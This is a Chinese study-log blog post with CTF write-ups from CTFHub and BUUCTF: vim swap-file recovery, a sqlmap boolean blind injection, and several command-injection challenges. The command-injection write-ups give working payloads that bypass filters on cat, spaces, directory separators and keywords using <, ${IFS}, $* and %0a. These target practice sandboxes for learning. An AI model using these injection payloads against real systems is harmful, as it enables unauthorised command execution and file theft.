第十周所学

python到131集

小迪安全30集

1.ctfhub vim缓存

搜索文献后得知vim在编辑文档的过程中如果异常退出,会产生缓存文件,第一次产生的缓存文件后缀为.swp,后面会产生swo等

在网页后输入index.php.swp

试一下访问/index.php.swo 仍然无法访问

 查了一下,因为.swp是隐藏文件,这类隐藏文件在调用时前面要加一个.

.index.php.swp

直接使用记事本打开,是一堆乱码

使用kali的vim命令恢复文件

vim -r index.php.swp

得到flag

 2.ctfhub 布尔盲注

我们使用sqlmap,首先爆破数据库,

得到数据库sqli,接着我们爆表

 得到

查看flag里的列

 最后我们查看字段

3.ctfhub 过滤cat

首先ping本机地址查看是否有回显,然后查看当前目录的文件,

我们尝试cat一下flag,发现没有出来

 标题为过滤cat,想办法绕过cat过滤,我们使用sort

 得到flag

4.ctfhub 过滤空格

发现了一个flag的php文件,我们尝试cat一下,没有得到flag,空格被过滤掉了

 因为空格被过滤了,我们可以使用 < 或 <> 重定向符来代替空格:

127.0.0.1&cat<flag_3199012005565.php

然后查看源代码,得到flag

5.ctfhub 过滤目录分隔符

先查看一下目录

这题没有后缀,说明是个文件,一般情况下可以直接用cat+路径,用目录分隔符代替

 但是这道题目录分隔符被过滤了,也查不到可以代替的字符(不过也不需要)

可以进入这个文件夹再打开文件,就用cd

127.0.0.1&cd flag_is_here;ls

我们看到了文件,可以使用cd读取

127.0.0.1&cd flag_is_here;cat flag_198702009428781.php |base64

6.ctfhub 过滤运算符

老方法,先查看一下目录

使用127.0.0.1;cat flag_26082847228238.php,然后查看页面源代码即可

 还有一种方法也可以得到flag,就是base64

127.0.0.1;base64 flag_286805817220.php

注意127.0.0.1;cat flag_35923221712564.php|base64   =   127.0.0.1;base64 flag_35923221712564.php  

7.ctfhub 综合过滤

打开网页,看到源代码

 用${IFS}取代空格,用$*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空

payload:http://challenge-c09fc6a8b681c5d6.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#

 回显有一个flag_is_here文件夹

构造payload:challenge-f81ed47ce4457bf6.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0als#

CTFHub 命令注入-综合练习

查看源代码得到flag

 

 8.buuctf  url编码

 

9. buuctf 看我回旋踢

10.buuctf 摩斯

 11.buuctf password

flag{zs19900315}

12.buuctf

13.buuctf rabbit

 flag{Cute_Rabbit}

14.buuctf 篱笆墙的影子

篱笆的意思是栅栏

15.buuctf misc三胖

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值